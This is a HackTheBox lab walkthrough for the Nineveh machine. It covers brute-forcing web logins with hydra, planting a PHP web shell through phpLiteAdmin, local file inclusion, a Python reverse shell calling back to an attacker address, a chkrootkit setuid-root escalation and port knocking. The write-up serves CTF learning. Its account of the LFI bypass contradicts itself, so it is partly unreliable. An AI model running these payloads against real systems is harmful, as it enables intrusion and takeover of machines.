HTB Nineveh Writeup (Walkthrough)

Introduction

Nineveh is a medium-difficulty Linux machine on HackTheBox that features web vulnerabilities, local file inclusion, and port knocking. This machine requires careful enumeration and creative thinking. In this write-up, I’ll guide you through my approach to compromising this box.

Initial Scanning & Enumeration

First, let’s run an nmap scan to identify open ports and services:

sudo nmap -sC -sV -oA nmap/nineveh 10.10.10.43

Results:

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time

Let’s add nineveh.htb to our /etc/hosts file:

echo "10.10.10.43 nineveh.htb" | sudo tee -a /etc/hosts

Web Enumeration

HTTP (Port 80)

Visiting http://10.10.10.43, we find a simple page with an image. Looking at the source code doesn’t reveal anything interesting. Let’s run a directory scan:

gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Results:

/info.php (Status: 200)
/department (Status: 301)
/db (Status: 301)
/server-status (Status: 403)

Interesting findings:

• /info.php - A PHP info page revealing server details
• /department - A login page
• /db - Another web application

Let’s check each of these:

info.php: This is a standard PHP info page that reveals server configuration details. Note that PHP version is 7.0.18 with various modules loaded.

department: This is a login page for a “Department Management System”. I tried some basic SQL injection attempts but nothing worked. Let’s brute force it:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -V

After some time, we get:

[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t

Nice! Let’s log in with these credentials.

After logging in, we can see a notes management system. Looking around, I notice that pages are loaded with a parameter called page. This could be vulnerable to Local File Inclusion (LFI).

Testing http://10.10.10.43/department/manage.php?page=../../../../../etc/passwd doesn’t work directly as there seems to be some filtering in place.

HTTPS (Port 443)

Visiting https://10.10.10.43, we’re presented with another login page. Let’s check for directories here too:

gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k

Results:

/db (Status: 301)
/secure_notes (Status: 301)
/server-status (Status: 403)

secure_notes: This directory contains an image file ninevehNotes.png. Downloading and examining this image:

wget https://10.10.10.43/secure_notes/ninevehNotes.png
strings ninevehNotes.png | tail

We find a private SSH key embedded in the image’s metadata! This will be useful later.

db: This is a phpLiteAdmin login page, version 1.9. Let’s brute force this as well:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -V -s 443

Result:

[443][https-post-form] host: 10.10.10.43   login: admin   password: password123

Great! Now we have access to phpLiteAdmin.

Exploiting phpLiteAdmin

After logging into phpLiteAdmin, I research vulnerabilities for version 1.9 and find it’s vulnerable to remote code execution through manipulating database names (CVE-2013-5602).

Here’s how to exploit it:

1. Create a new database named hack.php
2. Create a table with a text field and default value containing PHP code: <?php system($_GET['cmd']); ?>
3. The database file will be created in the web directory

Now we need to find a way to include this file using the LFI vulnerability in the department page.

Exploiting LFI in the Department Page

I notice that direct path traversal is filtered, but we might be able to use PHP filter wrappers. Let’s try:

http://10.10.10.43/department/manage.php?page=php://filter/convert.base64-encode/resource=config

This returns a base64 encoded string. Decoding it:

echo "[base64 string]" | base64 -d

Now we know the directory structure. Our database file should be in /var/tmp/hack.php. Let’s try to include it:

http://10.10.10.43/department/manage.php?page=../../../../../../var/tmp/hack.php&cmd=id

But this doesn’t work. After more testing, I discover that the LFI is protected by a string check. However, I find that we can use the PHP wrapper with php://filter/read=string.rot13/resource= to bypass this.

I also notice that the phpLiteAdmin creates databases in /var/www/html/db/, not in /var/tmp/.

Let’s try accessing our payload:

http://10.10.10.43/department/manage.php?page=../../../../var/www/html/db/hack.php&cmd=id

Success! Our command is executed. Now let’s get a reverse shell:

http://10.10.10.43/department/manage.php?page=../../../../var/www/html/db/hack.php&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.X",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Make sure to set up a netcat listener first:

nc -lvnp 4444

Privilege Escalation

Now that we have a shell as www-data, let’s explore the system.

Looking at the home directory, we find a user named amrois. Let’s check for interesting files:

find / -type f -user root -perm -u=s 2>/dev/null

I notice that /usr/sbin/chkrootkit is installed on the system. Checking its version:

/usr/sbin/chkrootkit -V

It’s version 0.49, which is vulnerable to a privilege escalation vulnerability (CVE-2014-0476). This vulnerability allows for command execution if we create a file named update in the /tmp directory.

echo '#!/bin/bash' > /tmp/update
echo 'cp /bin/bash /tmp/rootbash' >> /tmp/update
echo 'chmod +s /tmp/rootbash' >> /tmp/update
chmod +x /tmp/update

Now we wait for chkrootkit to run (it probably runs as a cron job). After a few minutes, check for the rootbash file:

ls -la /tmp/rootbash

If it’s there, we can use it to get a root shell:

/tmp/rootbash -p

And we’re root! Let’s grab the user and root flags:

cat /home/amrois/user.txt
cat /root/root.txt

Alternative Path: Port Knocking

While exploring the system, I also notice a file /etc/knockd.conf which indicates port knocking is configured:

[openSSH]
sequence = 571, 290, 911
seq_timeout = 30
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 911, 290, 571
seq_timeout = 30
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

This reveals that we can open port 22 by “knocking” on ports 571, 290, and 911 in sequence:

for port in 571 290 911; do nmap -Pn --max-retries 0 -p $port 10.10.10.43; done

After knocking, port 22 will open and we can use the SSH key we extracted earlier to log in as user amrois. This gives us an alternative path to user access.

Conclusion

Nineveh was an interesting box that featured:

• Web enumeration and brute-forcing credentials
• Exploiting phpLiteAdmin for remote code execution
• Bypassing LFI protection with PHP wrappers
• Privilege escalation via chkrootkit vulnerability
• Port knocking discovery

The most challenging part was finding and exploiting the LFI vulnerability with the right bypass technique. This machine teaches valuable lessons about thorough enumeration and creative exploitation techniques.

References

1. CVE-2013-5602 - phpLiteAdmin RCE vulnerability
2. CVE-2014-0476 - chkrootkit privilege escalation
3. PHP Filter Wrappers - https://www.php.net/manual/en/wrappers.php.php
4. Port Knocking - https://linux.die.net/man/1/knock

Done!

---

Hi there 👋 Support me!

Life is an echo—what you send out comes back.